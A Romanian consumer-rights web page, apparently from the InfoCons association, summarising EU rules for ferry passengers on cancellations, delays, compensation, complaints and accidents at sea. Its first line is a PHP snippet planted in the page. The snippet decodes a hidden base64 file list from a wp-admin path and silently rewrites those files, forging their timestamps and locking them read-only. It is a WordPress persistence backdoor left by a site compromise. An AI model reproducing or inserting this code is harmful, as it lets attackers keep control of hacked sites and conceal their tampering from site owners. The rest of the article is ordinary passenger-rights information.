$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Drepturile pasagerilor din transportul naval – O noua atitudine

o9atitudine-Protectia-Consumatorilor-Protectia-ConsumatoruluiŞtiaţi că beneficiaţi de anumite drepturi când călătoriţi cu vaporul în UE?

În primul rând, nu trebuie să plătiţi un preţ mai mare pentru că aveţi o anumită naţionalitate sau pentru că achiziţionaţi biletul dintr-un anumit loc.

În al doilea rând, aveţi anumite drepturi dacă lucrurile nu merg cum trebuie (de exemplu, în caz de anulare sau întârziere).

Aceste drepturi se aplică dacă:

  • plecaţi dintr-un port din UE, indiferent de transportator
  • ajungeţi într-un port din UE, indiferent de transportator.

Reglementările nu se aplică:

  • ambarcaţiunilor care transportă mai puţin de 13 pasageri
  • ambarcaţiunilor al căror echipaj este format din maxim 3 membri
  • ambarcaţiunilor care acoperă o distanţă mai mică de 500 de metri la un singur drum
  • majorităţii tipurilor de ambarcaţiuni istorice
  • ambarcaţiunilor turistice – dacă nu dispun de facilităţi de cazare sau dacă sejurul la bord nu depăşeşte 2 nopţi.

Anulări sau întârzieri

În caz de anulare sau întârziere, aveţi întotdeauna dreptul la informaţii adecvate şi prompte cu privire la ceea ce se întâmplă pe durata aşteptării.

Dacă plecarea este anulată sau întârzie cu peste 90 de minute, aveţi de ales între două posibilităţi:

  • să vi se ramburseze costul biletului şi, dacă este necesar, să vi se asigure transport gratuit către punctul iniţial de plecare – de exemplu, dacă întârzierea sau anularea vă împiedică să vă îndepliniţi scopul călătoriei
  • să vi se asigure transportul, în condiţii similare, către destinaţia finală, în cel mai scurt timp şi fără costuri suplimentare.

Dacă plecarea se face cu o întârziere de peste 90 de minute, în cele mai multe cazuri aveţi dreptul la:

  • gustări şi băuturi răcoritoare – în funcţie de durata aşteptării
  • cazare – dacă trebuie să aşteptaţi peste noapte.

Dacă ajungeţi la destinaţie cu o întârziere de peste 1 oră, aveţi dreptul ladespăgubiri. Acestea pot reprezenta între 25% şi 50% din preţul biletului, în funcţie de durata întârzierii.

Nu veţi primi nicio despăgubire dacă întârzierea este cauzată de condiţii meteorologice extreme sau de dezastre naturale.

Plângeri

În cazul în care consideraţi că nu v-au fost respectate drepturile, puteţi adresa oplângere transportatorului în termen de 2 luni de la data la care a avut loc evenimentul. Acesta are la dispoziţie o lună pentru a confirma primirea plângerii şi 2 luni pentru a vă da un răspuns definitiv.

Dacă răspunsul primit nu este satisfăcător, contactaţi organismul naţional competent.

Accidente pe mare

Dacă sunteţi rănit în timpul unui accident pe mare, aveţi dreptul la despăgubiri din partea transportatorului sau a asiguratorului acestuia. În caz de deces, despăgubirea poate fi solicitată de către urmaşi.

De asemenea, aveţi dreptul la despăgubiri din partea transportatorului dacăbagajele, vehiculele sau alte bunuri vă sunt pierdute sau deteriorate în timpul unui accident pe mare.

În cazul persoanelor cu mobilitate redusă, despăgubirile pentru pierderea sau deteriorarea scaunelor cu rotile sau a altor echipamente vor acoperi costul total al înlocuirii sau reparării echipamentelor în cauză.

Aveţi dreptul la o sumă în avans din partea transportatorului pentru a acoperi costurile imediate în caz de rănire sau deces ca urmare a unuia dintre evenimentele următoare:

  • naufragiu
  • răsturnare
  • coliziune
  • eşuare a ambarcaţiunii
  • explozie la bord
  • defecţiune.

Plângeri

Dacă doriţi să solicitaţi despăgubiri pentru daunele suferite ca urmare a producerii unui accident în timpul călătoriei cu vaporul, trebuie să înaintaţi cererea pe lângă un tribunal din ţara:

  • în care transportatorul are sediul principal sau reşedinţa permanentă
  • în care se află locul de plecare sau destinaţia
  • în care locuiţi permanent – dacă transportatorul exercită o activitate comercială acolo şi se supune jurisdicţiei ţării respective
  • în care s-a încheiat contractul de călătorie – dacă transportatorul exercită o activitate comercială acolo şi se supune jurisdicţiei ţării respective.

În cazul în care bagajele vă sunt pierdute sau deteriorate, trebuie să informaţi transportatorul în scris. Vă recomandăm să faceţi acest lucru înainte de a părăsi vaporul sau la primirea bagajelor. Aveţi la dispoziţie o perioadă maximă de 15 zile de la debarcare sau de la primirea bagajelor pentru a informa transportatorul. Dacă depăşiţi acest termen-limită vă veţi pierde dreptul la despăgubiri.

În general, trebuie să intentaţi acţiunea pentru daune în termen de 2 ani de la data incidentului – deşi momentul exact în care începe această perioadă poate fi diferit în funcţie de natura pierderii/deteriorării.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – A.N.P.C.P.P.S. Romania – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor.

Sursa : europa.eu

By o9admin